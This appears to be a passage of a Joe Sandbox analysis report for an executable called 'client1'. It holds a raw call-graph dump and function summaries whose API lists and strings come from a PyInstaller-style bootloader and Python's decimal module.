97063 7ff79f622770 59 API calls 2 library calls 96949->97063 96951 7ff79f62472c 96951->96702 96952 7ff79f62481b 96952->96702 96954 7ff79f6212b0 122 API calls 96954->96956 96956->96952 96956->96954 97064 7ff79f622770 59 API calls 2 library calls 96956->97064 97065 7ff79f621780 59 API calls 
96956->97065 96958 7ff79f624947 96957->96958 96960 7ff79f62485b 96957->96960 96958->96704 96960->96958 96961 7ff79f622770 59 API calls 96960->96961 97066 7ff79f621780 59 API calls 96960->97066 96961->96960 96963 7ff79f6212f8 96962->96963 96964 7ff79f6212c6 96962->96964 96966 7ff79f62f934 73 API calls 96963->96966 96965 7ff79f623cb0 116 API calls 96964->96965 96967 7ff79f6212d6 96965->96967 96968 7ff79f62130a 96966->96968 96967->96963 96971 7ff79f6212de 96967->96971 96969 7ff79f62130e 96968->96969 96970 7ff79f62132f 96968->96970 97086 7ff79f6224d0 59 API calls 3 library calls 96969->97086 96976 7ff79f621364 96970->96976 96977 7ff79f621344 96970->96977 97085 7ff79f622770 59 API calls 2 library calls 96971->97085 96974 7ff79f621325 96974->96720 96975 7ff79f6212ee 96975->96720 96979 7ff79f62137e 96976->96979 96983 7ff79f621395 96976->96983 97087 7ff79f6224d0 59 API calls 3 library calls 96977->97087 97067 7ff79f621050 96979->97067 96981 7ff79f62f5fc _fread_nolock 53 API calls 96981->96983 96982 7ff79f621421 96982->96720 96983->96981 96985 7ff79f6213de 96983->96985 96986 7ff79f62135f __std_exception_copy 96983->96986 96984 7ff79f62f2ac 74 API calls 96984->96982 97088 7ff79f6224d0 59 API calls 3 library calls 96985->97088 96986->96982 96986->96984 96988->96712 96989->96712 96990->96720 96991->96722 96992->96725 96993->96730 96994->96730 96995->96712 96996->96712 96997->96712 96999 7ff79f621b30 49 API calls 96998->96999 97000 7ff79f623d60 96999->97000 97000->96903 97002 7ff79f623c4a 97001->97002 97003 7ff79f627a30 57 API calls 97002->97003 97004 7ff79f623c72 97003->97004 97005 7ff79f62ad80 _wfindfirst32i64 8 API calls 97004->97005 97006 7ff79f623c9a 97005->97006 97006->96897 97006->96918 97008 7ff79f627a30 57 API calls 97007->97008 97009 7ff79f6271c7 LoadLibraryExW 97008->97009 97010 7ff79f6271e4 __std_exception_copy 97009->97010 97010->96912 97011->96901 97012->96902 97013->96905 97014->96901 97015->96901 97017 7ff79f624ada 97016->97017 97021 7ff79f624bf3 97017->97021 
97025 7ff79f624cc9 97017->97025 97042 7ff79f624c91 97017->97042 97048 7ff79f6356d0 47 API calls 97017->97048 97049 7ff79f621780 59 API calls 97017->97049 97018 7ff79f62ad80 _wfindfirst32i64 8 API calls 97020 7ff79f624cb0 97018->97020 97046 7ff79f627c30 59 API calls __std_exception_copy 97020->97046 97021->97042 97050 7ff79f639184 97021->97050 97060 7ff79f622770 59 API calls 2 library calls 97025->97060 97028 7ff79f624c16 97029 7ff79f639184 _fread_nolock 37 API calls 97028->97029 97030 7ff79f624c28 97029->97030 97057 7ff79f6357dc 39 API calls 3 library calls 97030->97057 97032 7ff79f624c34 97058 7ff79f635d64 73 API calls 97032->97058 97034 7ff79f624c46 97059 7ff79f635d64 73 API calls 97034->97059 97036 7ff79f624c58 97037 7ff79f634f14 71 API calls 97036->97037 97038 7ff79f624c69 97037->97038 97039 7ff79f634f14 71 API calls 97038->97039 97040 7ff79f624c7d 97039->97040 97041 7ff79f634f14 71 API calls 97040->97041 97041->97042 97042->97018 97043->96921 97044->96929 97045->96940 97046->96945 97047->96933 97048->97017 97049->97017 97051 7ff79f63918d 97050->97051 97052 7ff79f624c0a 97050->97052 97061 7ff79f634444 11 API calls _set_fmode 97051->97061 97056 7ff79f6357dc 39 API calls 3 library calls 97052->97056 97054 7ff79f639192 97062 7ff79f639db0 37 API calls _invalid_parameter_noinfo 97054->97062 97056->97028 97057->97032 97058->97034 97059->97036 97060->97042 97061->97054 97063->96951 97064->96956 97065->96956 97066->96960 97068 7ff79f6210a6 97067->97068 97069 7ff79f6210ad 97068->97069 97070 7ff79f6210d3 97068->97070 97093 7ff79f622770 59 API calls 2 library calls 97069->97093 97073 7ff79f621109 97070->97073 97074 7ff79f6210ed 97070->97074 97072 7ff79f6210c0 97072->96986 97076 7ff79f62111b 97073->97076 97083 7ff79f621137 memcpy_s 97073->97083 97094 7ff79f6224d0 59 API calls 3 library calls 97074->97094 97095 7ff79f6224d0 59 API calls 3 library calls 97076->97095 97078 7ff79f62f5fc _fread_nolock 53 API calls 97078->97083 97079 7ff79f621104 __std_exception_copy 
97079->96986 97080 7ff79f6211fe 97096 7ff79f622770 59 API calls 2 library calls 97080->97096 97083->97078 97083->97079 97083->97080 97084 7ff79f62f370 37 API calls 97083->97084 97089 7ff79f62fd3c 97083->97089 97084->97083 97085->96975 97086->96974 97087->96986 97088->96986 97090 7ff79f62fd6c 97089->97090 97097 7ff79f62fa8c 97090->97097 97092 7ff79f62fd8a 97092->97083 97093->97072 97094->97079 97095->97079 97096->97079 97098 7ff79f62fad9 97097->97098 97099 7ff79f62faac 97097->97099 97098->97092 97099->97098 97100 7ff79f62fae1 97099->97100 97101 7ff79f62fab6 97099->97101 97104 7ff79f62f9cc 97100->97104 97111 7ff79f639ce4 37 API calls 2 library calls 97101->97111 97112 7ff79f6342ec EnterCriticalSection 97104->97112 97106 7ff79f62f9e9 97107 7ff79f62fa0c 74 API calls 97106->97107 97108 7ff79f62f9f2 97107->97108 97109 7ff79f6342f8 _fread_nolock LeaveCriticalSection 97108->97109 97110 7ff79f62f9fd 97109->97110 97110->97098 97111->97098 97114 7ff79f6229a6 97113->97114 97115 7ff79f621b30 49 API calls 97114->97115 97116 7ff79f6229db 97115->97116 97117 7ff79f623b20 49 API calls 97116->97117 97145 7ff79f622de1 97116->97145 97118 7ff79f622a4f 97117->97118 97171 7ff79f622e00 97118->97171 97121 7ff79f622aca 97124 7ff79f622e00 75 API calls 97121->97124 97122 7ff79f622a91 97179 7ff79f626720 98 API calls 97122->97179 97126 7ff79f622b1c 97124->97126 97125 7ff79f622a99 97127 7ff79f622aba 97125->97127 97180 7ff79f626600 138 API calls 2 library calls 97125->97180 97128 7ff79f622b20 97126->97128 97129 7ff79f622b86 97126->97129 97135 7ff79f622ac3 97127->97135 97183 7ff79f622770 59 API calls 2 library calls 97127->97183 97181 7ff79f626720 98 API calls 97128->97181 97132 7ff79f622e00 75 API calls 97129->97132 97136 7ff79f622bb2 97132->97136 97134 7ff79f622b28 97134->97127 97182 7ff79f626600 138 API calls 2 library calls 97134->97182 97139 7ff79f62ad80 _wfindfirst32i64 8 API calls 97135->97139 97140 7ff79f622e00 75 API calls 97136->97140 97147 7ff79f622c12 97136->97147 97142 7ff79f622b7b 
97139->97142 97143 7ff79f622be2 97140->97143 97141 7ff79f622b45 97141->97127 97144 7ff79f622dc6 97141->97144 97142->96739 97146 7ff79f622e00 75 API calls 97143->97146 97143->97147 97188 7ff79f622770 59 API calls 2 library calls 97144->97188 97146->97147 97147->97145 97184 7ff79f626720 98 API calls 97147->97184 97148 7ff79f621af0 59 API calls 97151 7ff79f622c7f 97148->97151 97150 7ff79f622c22 97150->97145 97150->97148 97159 7ff79f622d3f 97150->97159 97151->97145 97153 7ff79f621b30 49 API calls 97151->97153 97152 7ff79f622d3a 97189 7ff79f621ab0 74 API calls __std_exception_copy 97152->97189 97155 7ff79f622ca7 97153->97155 97155->97144 97157 7ff79f621b30 49 API calls 97155->97157 97156 7ff79f622dab 97156->97144 97187 7ff79f621440 161 API calls 2 library calls 97156->97187 97158 7ff79f622cd4 97157->97158 97158->97144 97161 7ff79f621b30 49 API calls 97158->97161 97159->97156 97186 7ff79f621780 59 API calls 97159->97186 97162 7ff79f622d01 97161->97162 97162->97144 97164 7ff79f6217b0 121 API calls 97162->97164 97165 7ff79f622d23 97164->97165 97165->97159 97166 7ff79f622d27 97165->97166 97185 7ff79f622770 59 API calls 2 library calls 97166->97185 97168->96739 97169->96733 97170->96739 97172 7ff79f622e34 97171->97172 97190 7ff79f633be4 97172->97190 97176 7ff79f622e6b 97177 7ff79f62ad80 _wfindfirst32i64 8 API calls 97176->97177 97178 7ff79f622a8d 97177->97178 97178->97121 97178->97122 97179->97125 97180->97127 97181->97134 97182->97141 97183->97135 97184->97150 97185->97152 97186->97159 97187->97156 97188->97152 97189->97145 97191 7ff79f633c3e 97190->97191 97192 7ff79f633c63 97191->97192 97194 7ff79f633c9f 97191->97194 97225 7ff79f639ce4 37 API calls 2 library calls 97192->97225 97226 7ff79f631e70 49 API calls _invalid_parameter_noinfo 97194->97226 97196 7ff79f633c8d 97199 7ff79f62ad80 _wfindfirst32i64 8 API calls 97196->97199 97198 7ff79f633d36 97200 7ff79f633d7c 97198->97200 97202 7ff79f633d51 97198->97202 97203 7ff79f633da0 97198->97203 97204 7ff79f633d48 97198->97204 
97201 7ff79f622e5a 97199->97201 97229 7ff79f639e18 11 API calls 2 library calls 97200->97229 97201->97176 97208 7ff79f634e08 97201->97208 97227 7ff79f639e18 11 API calls 2 library calls 97202->97227 97203->97200 97205 7ff79f633daa 97203->97205 97204->97200 97204->97202 97228 7ff79f639e18 11 API calls 2 library calls 97205->97228 97209 7ff79f634e31 97208->97209 97210 7ff79f634e25 97208->97210 97255 7ff79f634a1c 45 API calls __GetCurrentState 97209->97255 97230 7ff79f634680 97210->97230 97213 7ff79f634e59 97217 7ff79f634e69 97213->97217 97256 7ff79f63dfcc 5 API calls __crtLCMapStringW 97213->97256 97216 7ff79f634ec1 97218 7ff79f634ed9 97216->97218 97219 7ff79f634ec5 97216->97219 97257 7ff79f634504 14 API calls 3 library calls 97217->97257 97221 7ff79f634680 69 API calls 97218->97221 97220 7ff79f634e2a 97219->97220 97258 7ff79f639e18 11 API calls 2 library calls 97219->97258 97220->97176 97223 7ff79f634ee5 97221->97223 97223->97220 97259 7ff79f639e18 11 API calls 2 library calls 97223->97259 97225->97196 97226->97198 97227->97196 97228->97196 97229->97196 97231 7ff79f63469a 97230->97231 97232 7ff79f6346b7 97230->97232 97260 7ff79f634424 11 API calls _set_fmode 97231->97260 97232->97231 97234 7ff79f6346ca CreateFileW 97232->97234 97236 7ff79f6346fe 97234->97236 97237 7ff79f634734 97234->97237 97235 7ff79f63469f 97261 7ff79f634444 11 API calls _set_fmode 97235->97261 97263 7ff79f6347d4 59 API calls 3 library calls 97236->97263 97264 7ff79f634cf8 46 API calls 3 library calls 97237->97264 97241 7ff79f63470c 97244 7ff79f634729 CloseHandle 97241->97244 97245 7ff79f634713 CloseHandle 97241->97245 97242 7ff79f634739 97246 7ff79f634768 97242->97246 97247 7ff79f63473d 97242->97247 97243 7ff79f6346a7 97262 7ff79f639db0 37 API calls _invalid_parameter_noinfo 97243->97262 97249 7ff79f6346b2 97244->97249 97245->97249 97266 7ff79f634ab8 51 API calls 97246->97266 97265 7ff79f6343b8 11 API calls 2 library calls 97247->97265 97249->97220 97252 7ff79f634775 97267 7ff79f634bf4 21 API 
calls _fread_nolock 97252->97267 97254 7ff79f634747 97254->97249 97255->97213 97256->97217 97257->97216 97258->97220 97259->97220 97260->97235 97261->97243 97263->97241 97264->97242 97265->97254 97266->97252 97267->97254 97268->96749 97271 7ff79f6353fc 97270->97271 97272 7ff79f635422 97271->97272 97275 7ff79f635455 97271->97275 97301 7ff79f634444 11 API calls _set_fmode 97272->97301 97274 7ff79f635427 97302 7ff79f639db0 37 API calls _invalid_parameter_noinfo 97274->97302 97277 7ff79f635468 97275->97277 97278 7ff79f63545b 97275->97278 97289 7ff79f63a0f8 97277->97289 97303 7ff79f634444 11 API calls _set_fmode 97278->97303 97282 7ff79f635489 97296 7ff79f63f49c 97282->97296 97283 7ff79f63547c 97304 7ff79f634444 11 API calls _set_fmode 97283->97304 97286 7ff79f63549c 97305 7ff79f6342f8 LeaveCriticalSection 97286->97305 97288 7ff79f623d09 97288->96760 97306 7ff79f63f788 EnterCriticalSection 97289->97306 97291 7ff79f63a10f 97292 7ff79f63a16c 19 API calls 97291->97292 97293 7ff79f63a11a 97292->97293 97294 7ff79f63f7e8 _isindst LeaveCriticalSection 97293->97294 97295 7ff79f635472 97294->97295 97295->97282 97295->97283 97307 7ff79f63f198 97296->97307 97299 7ff79f63f4f6 97299->97286 97301->97274 97303->97288 97304->97288 97308 7ff79f63f1d3 __vcrt_FlsAlloc 97307->97308 97317 7ff79f63f39a 97308->97317 97322 7ff79f645474 51 API calls 3 library calls 97308->97322 97310 7ff79f63f471 97326 7ff79f639db0 37 API calls _invalid_parameter_noinfo 97310->97326 97312 7ff79f63f3a3 97312->97299 97319 7ff79f64615c 97312->97319 97314 7ff79f63f405 97314->97317 97323 7ff79f645474 51 API calls 3 library calls 97314->97323 97316 7ff79f63f424 97316->97317 97324 7ff79f645474 51 API calls 3 library calls 97316->97324 97317->97312 97325 7ff79f634444 11 API calls _set_fmode 97317->97325 97327 7ff79f64575c 97319->97327 97322->97314 97323->97316 97324->97317 97325->97310 97328 7ff79f645791 97327->97328 97329 7ff79f645773 97327->97329 97328->97329 97332 7ff79f6457ad 97328->97332 97381 7ff79f634444 11 API 
calls _set_fmode 97329->97381 97331 7ff79f645778 97382 7ff79f639db0 37 API calls _invalid_parameter_noinfo 97331->97382 97338 7ff79f645d6c 97332->97338 97335 7ff79f645784 97335->97299 97384 7ff79f645aa0 97338->97384 97341 7ff79f645df9 97404 7ff79f636cfc 97341->97404 97342 7ff79f645de1 97416 7ff79f634424 11 API calls _set_fmode 97342->97416 97346 7ff79f645de6 97417 7ff79f634444 11 API calls _set_fmode 97346->97417 97374 7ff79f6457d8 97374->97335 97383 7ff79f636cd4 LeaveCriticalSection 97374->97383 97381->97331 97385 7ff79f645acc 97384->97385 97392 7ff79f645ae6 97384->97392 97385->97392 97429 7ff79f634444 11 API calls _set_fmode 97385->97429 97387 7ff79f645adb 97430 7ff79f639db0 37 API calls _invalid_parameter_noinfo 97387->97430 97389 7ff79f645bb5 97402 7ff79f645c12 97389->97402 97435 7ff79f63576c 37 API calls 2 library calls 97389->97435 97390 7ff79f645b64 97390->97389 97433 7ff79f634444 11 API calls _set_fmode 97390->97433 97392->97390 97431 7ff79f634444 11 API calls _set_fmode 97392->97431 97394 7ff79f645c0e 97397 7ff79f645c90 97394->97397 97394->97402 97396 7ff79f645baa 97434 7ff79f639db0 37 API calls _invalid_parameter_noinfo 97396->97434 97436 7ff79f639dd0 17 API calls _wfindfirst32i64 97397->97436 97398 7ff79f645b59 97432 7ff79f639db0 37 API calls _invalid_parameter_noinfo 97398->97432 97402->97341 97402->97342 97437 7ff79f63f788 EnterCriticalSection 97404->97437 97416->97346 97417->97374 97429->97387 97431->97398 97433->97396 97435->97394 97439 7ff79f637968 97438->97439 97442 7ff79f637444 97439->97442 97441 7ff79f637981 97441->96770 97443 7ff79f63748e 97442->97443 97444 7ff79f63745f 97442->97444 97452 7ff79f6342ec EnterCriticalSection 97443->97452 97453 7ff79f639ce4 37 API calls 2 library calls 97444->97453 97447 7ff79f637493 97449 7ff79f6374b0 38 API calls 97447->97449 97448 7ff79f63747f 97448->97441 97450 7ff79f63749f 97449->97450 97451 7ff79f6342f8 _fread_nolock LeaveCriticalSection 97450->97451 97451->97448 97453->97448 97455 7ff79f62f0d1 97454->97455 
97456 7ff79f62f0a3 97454->97456 97463 7ff79f62f0c3 97455->97463 97464 7ff79f6342ec EnterCriticalSection 97455->97464 97465 7ff79f639ce4 37 API calls 2 library calls 97456->97465 97459 7ff79f62f0e8 97460 7ff79f62f104 72 API calls 97459->97460 97461 7ff79f62f0f4 97460->97461 97462 7ff79f6342f8 _fread_nolock LeaveCriticalSection 97461->97462 97462->97463 97463->96774 97465->97463 97466 7ffbaa70de38 97467 7ffbaa7166fc __acrt_iob_func 97466->97467 97468 7ffbaa70deae 97466->97468 97582 7ffbaa717218 __stdio_common_vfprintf 97467->97582 97578 7ffbaa70e7b8 97468->97578 97471 7ffbaa716723 __acrt_iob_func 97583 7ffbaa717218 __stdio_common_vfprintf 97471->97583 97472 7ffbaa70df14 97475 7ffbaa716803 97472->97475 97477 7ffbaa70e7b8 PyErr_Format 97472->97477 97474 7ffbaa71673d __acrt_iob_func fputc 97484 7ffbaa71675c _Py_Dealloc 97474->97484 97476 7ffbaa716873 97475->97476 97478 7ffbaa71686d _Py_Dealloc 97475->97478 97480 7ffbaa716888 97476->97480 97482 7ffbaa71687f _Py_Dealloc 97476->97482 97479 7ffbaa70df37 97477->97479 97478->97476 97479->97475 97481 7ffbaa70df47 PyType_Ready 97479->97481 97483 7ffbaa71689d 97480->97483 97486 7ffbaa716894 _Py_Dealloc 97480->97486 97481->97475 97485 7ffbaa70df7f PyType_Ready 97481->97485 97482->97480 97487 7ffbaa7168b1 97483->97487 97489 7ffbaa7168a8 _Py_Dealloc 97483->97489 97491 7ffbaa71676b _Py_Dealloc 97484->97491 97485->97475 97488 7ffbaa70df94 PyType_Ready 97485->97488 97486->97483 97490 7ffbaa7168d0 97487->97490 97493 7ffbaa7168ca _Py_Dealloc 97487->97493 97488->97475 97492 7ffbaa70dfa9 PyType_Ready 97488->97492 97489->97487 97494 7ffbaa7168ef 97490->97494 97497 7ffbaa7168e9 _Py_Dealloc 97490->97497 97498 7ffbaa71677a _Py_Dealloc 97491->97498 97492->97475 97496 7ffbaa70dfbe PyUnicode_FromString 97492->97496 97493->97490 97495 7ffbaa71690e 97494->97495 97499 7ffbaa716908 _Py_Dealloc 97494->97499 97500 7ffbaa71692d 97495->97500 97504 7ffbaa716927 _Py_Dealloc 97495->97504 97501 7ffbaa716810 97496->97501 97502 7ffbaa70dfd7 
PyDict_SetItemString 97496->97502 97497->97494 97503 7ffbaa716786 _Py_Dealloc 97498->97503 97499->97495 97506 7ffbaa71694c 97500->97506 97510 7ffbaa716946 _Py_Dealloc 97500->97510 97505 7ffbaa716824 97501->97505 97508 7ffbaa71681b _Py_Dealloc 97501->97508 97502->97501 97507 7ffbaa70dff6 PyDict_SetItemString 97502->97507 97513 7ffbaa716792 _Py_Dealloc 97503->97513 97504->97500 97509 7ffbaa716838 97505->97509 97514 7ffbaa71682f _Py_Dealloc 97505->97514 97512 7ffbaa71696b 97506->97512 97516 7ffbaa716965 _Py_Dealloc 97506->97516 97507->97501 97511 7ffbaa70e015 97507->97511 97508->97505 97509->97475 97519 7ffbaa716847 _Py_Dealloc 97509->97519 97510->97506 97511->97484 97515 7ffbaa70e01f PyImport_ImportModule 97511->97515 97517 7ffbaa71697f 97512->97517 97520 7ffbaa716976 _Py_Dealloc 97512->97520 97521 7ffbaa7167a1 _Py_Dealloc 97513->97521 97514->97509 97515->97505 97518 7ffbaa70e038 PyObject_GetAttrString 97515->97518 97516->97512 97518->97505 97522 7ffbaa70e058 PyObject_CallMethod 97518->97522 97519->97475 97520->97517 97524 7ffbaa7167ad _Py_Dealloc 97521->97524 97522->97501 97523 7ffbaa70e082 97522->97523 97523->97491 97525 7ffbaa70e08c PyObject_GetAttrString 97523->97525 97527 7ffbaa7167b9 _Py_Dealloc 97524->97527 97525->97505 97526 7ffbaa70e0ac 97525->97526 97526->97498 97526->97503 97528 7ffbaa70e0cd PyImport_ImportModule 97526->97528 97530 7ffbaa7167c5 _Py_Dealloc 97527->97530 97528->97475 97529 7ffbaa70e0e6 PyObject_CallMethod 97528->97529 97529->97475 97531 7ffbaa70e120 PyUnicode_FromString 97529->97531 97533 7ffbaa7167d4 _Py_Dealloc 97530->97533 97531->97501 97532 7ffbaa70e139 PyDict_SetItemString 97531->97532 97532->97501 97534 7ffbaa70e15f 97532->97534 97536 7ffbaa7167e3 PyModule_AddIntConstant 97533->97536 97534->97513 97535 7ffbaa70e169 PyImport_ImportModule 97534->97535 97535->97475 97537 7ffbaa70e182 PyObject_GetAttrString 97535->97537 97536->97475 97576 7ffbaa70e667 97536->97576 97537->97475 97538 7ffbaa70e19e PyObject_CallFunction 97537->97538 
97538->97475 97540 7ffbaa70e1d5 97538->97540 97539 7ffbaa70e67e 97541 7ffbaa70e68b PyUnicode_InternFromString 97539->97541 97544 7ffbaa70e6e2 PyModule_AddStringConstant 97539->97544 97540->97521 97540->97524 97540->97527 97543 7ffbaa70e209 PyModule_Create2 97540->97543 97541->97475 97542 7ffbaa70e6b1 PyModule_AddObject 97541->97542 97542->97475 97542->97539 97543->97475 97545 7ffbaa70e227 PyModule_AddObject 97543->97545 97544->97475 97546 7ffbaa70e701 PyModule_AddStringConstant 97544->97546 97545->97475 97547 7ffbaa70e24d PyModule_AddObject 97545->97547 97546->97501 97548 7ffbaa70e723 97546->97548 97547->97475 97549 7ffbaa70e273 PyModule_AddObject 97547->97549 97549->97475 97550 7ffbaa70e295 PyErr_NewException 97549->97550 97550->97475 97551 7ffbaa70e2bf PyModule_AddObject 97550->97551 97551->97475 97552 7ffbaa70e2dd PyTuple_New 97551->97552 97552->97475 97553 7ffbaa70e2f8 97552->97553 97553->97530 97554 7ffbaa70e73e PyTuple_Pack 97553->97554 97556 7ffbaa70e75f PyTuple_Pack 97553->97556 97557 7ffbaa70e332 PyTuple_Pack 97553->97557 97559 7ffbaa70e376 PyModule_AddObject 97553->97559 97571 7ffbaa70e3c0 97553->97571 97554->97556 97556->97554 97557->97475 97558 7ffbaa70e350 PyErr_NewException 97557->97558 97558->97475 97558->97553 97559->97475 97559->97553 97560 7ffbaa70e459 PyObject_CallObject 97560->97475 97561 7ffbaa70e47b PyModule_AddObject 97560->97561 97561->97475 97562 7ffbaa70e499 PyContextVar_New 97561->97562 97562->97475 97566 7ffbaa70e4b8 PyModule_AddObject 97562->97566 97563 7ffbaa70e3eb PyTuple_Pack 97563->97475 97565 7ffbaa70e402 PyErr_NewException 97563->97565 97564 7ffbaa70e79d PyTuple_Pack 97564->97467 97565->97475 97565->97571 97566->97475 97567 7ffbaa70e4e1 PyModule_AddObject 97566->97567 97567->97475 97569 7ffbaa70e50a PyObject_CallObject 97567->97569 97568 7ffbaa70e428 PyModule_AddObject 97568->97475 97568->97571 97569->97475 97570 7ffbaa70e528 PyModule_AddObject 97569->97570 97570->97475 97572 7ffbaa70e5a8 PyObject_CallObject 97570->97572 
97571->97533 97571->97560 97571->97563 97571->97564 97571->97568 97572->97475 97573 7ffbaa70e5c3 PyModule_AddObject 97572->97573 97573->97475 97574 7ffbaa70e621 97573->97574 97575 7ffbaa70e631 PyLong_FromSsize_t 97574->97575 97574->97576 97575->97475 97577 7ffbaa70e647 PyModule_AddObject 97575->97577 97576->97536 97576->97539 97577->97501 97577->97574 97579 7ffbaa716986 PyErr_Format 97578->97579 97580 7ffbaa70e7cf 97578->97580 97579->97472 97580->97579 97581 7ffbaa70e80d 97580->97581 97581->97472 97582->97471 97583->97474 97584 7ffbab498382 97586 7ffbab4983c6 97584->97586 97585 7ffbab4983fe 97587 7ffbab498420 97585->97587 97588 7ffbab498417 _Py_Dealloc 97585->97588 97586->97585 97591 7ffbab4983dd 97586->97591 97589 7ffbab49842b _Py_Dealloc 97587->97589 97590 7ffbab498434 97587->97590 97588->97587 97589->97590 97592 7ffbab49844d _Py_Dealloc 97590->97592 97593 7ffbab498453 97590->97593 97595 7ffbab4983e3 _Py_Dealloc 97591->97595 97596 7ffbab4983ec 97591->97596 97592->97593 97594 7ffbab498472 97593->97594 97597 7ffbab49846c _Py_Dealloc 97593->97597 97598 7ffbab498491 97594->97598 97599 7ffbab49848b _Py_Dealloc 97594->97599 97595->97596 97597->97594 97600 7ffbab4984b0 97598->97600 97601 7ffbab4984aa _Py_Dealloc 97598->97601 97599->97598 97602 7ffbab4984cf 97600->97602 97604 7ffbab4984c9 _Py_Dealloc 97600->97604 97601->97600 97603 7ffbab4984ee 97602->97603 97605 7ffbab4984e8 _Py_Dealloc 97602->97605 97606 7ffbab49850d 97603->97606 97607 7ffbab498507 _Py_Dealloc 97603->97607 97604->97602 97605->97603 97608 7ffbab49852c 97606->97608 97609 7ffbab498526 _Py_Dealloc 97606->97609 97607->97606 97610 7ffbab49854b 97608->97610 97611 7ffbab498545 _Py_Dealloc 97608->97611 97609->97608 97611->97610

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                    • String ID:
                                                    • API String ID: 1617910340-0
                                                    • Opcode ID: f9714f3a8e10acd42ca2d2c5b2c2c8a966f4ca54d5d677232d284773bb45134f
                                                    • Instruction ID: 0ea52da5d498d6fa947fcb687aec398ebf56143a13dc56fbb48df1efb45d6f64
                                                    • Opcode Fuzzy Hash: f9714f3a8e10acd42ca2d2c5b2c2c8a966f4ca54d5d677232d284773bb45134f
                                                    • Instruction Fuzzy Hash: B3C1A032B24B8286EB20FF75C4906ECB76AEB49B98B810235DA2E577D5CF39D451C710
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Module_Object$String$Object_$CallTuple_$Pack$Err_FromReadyType_$AttrDict_ExceptionImportImport_ItemModuleUnicode___acrt_iob_func$ConstantMethod$ContextCreate2FormatFunctionInternLong_Ssize_tVar_fputc
                                                    • String ID: %s:%d: warning: $(O)$(ss)$1.70$2.5.1$BasicContext$Context$D:\a\1\s\Modules\_decimal\libmpdec\context.c$Decimal$DecimalException$DecimalTuple$DefaultContext$ExtendedContext$HAVE_CONTEXTVAR$HAVE_THREADS$MutableMapping$Number$Rational$SignalDict$__libmpdec_version__$__module__$__version__$as_integer_ratio$bit_length$collections$collections.abc$decimal$decimal.DecimalException$decimal_context$mpd_setminalloc: ignoring request to set MPD_MINALLOC a second time$namedtuple$numbers$register$s(OO){}$sign digits exponent
                                                    • API String ID: 2210023312-630389593
                                                    • Opcode ID: 82cadfb3d86e8010ec5de67c75d19b610295d7370cadf0ded26554864ad2c3d9
                                                    • Instruction ID: bf0de3b00c253d75e54a51d5f42226cce38df67bc0a0d214b04a4a9accd14fc6
                                                    • Opcode Fuzzy Hash: 82cadfb3d86e8010ec5de67c75d19b610295d7370cadf0ded26554864ad2c3d9
                                                    • Instruction Fuzzy Hash: 7B62E7A1A0BA42C1EB168F35E8541B66BECBF44B95F4451B6CE4D12374DF3DA54BC320

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _fread_nolock$Message_invalid_parameter_noinfo
                                                    • String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                    • API String ID: 2153230061-4158440160
                                                    • Opcode ID: 9101801a2d3ac821dc45f3c210c6535dcaecc234eedfce769c1e2387d8d123d1
                                                    • Instruction ID: 9aac773805030bf4195233d69171114b75a8bd81207c8e60e0cba850760d5a67
                                                    • Opcode Fuzzy Hash: 9101801a2d3ac821dc45f3c210c6535dcaecc234eedfce769c1e2387d8d123d1
                                                    • Instruction Fuzzy Hash: DF516F72A1978286EF24EF38D8901F8A3AAEB48B58B914135D92CC7395DF3CE540C751

                                                    Control-flow Graph

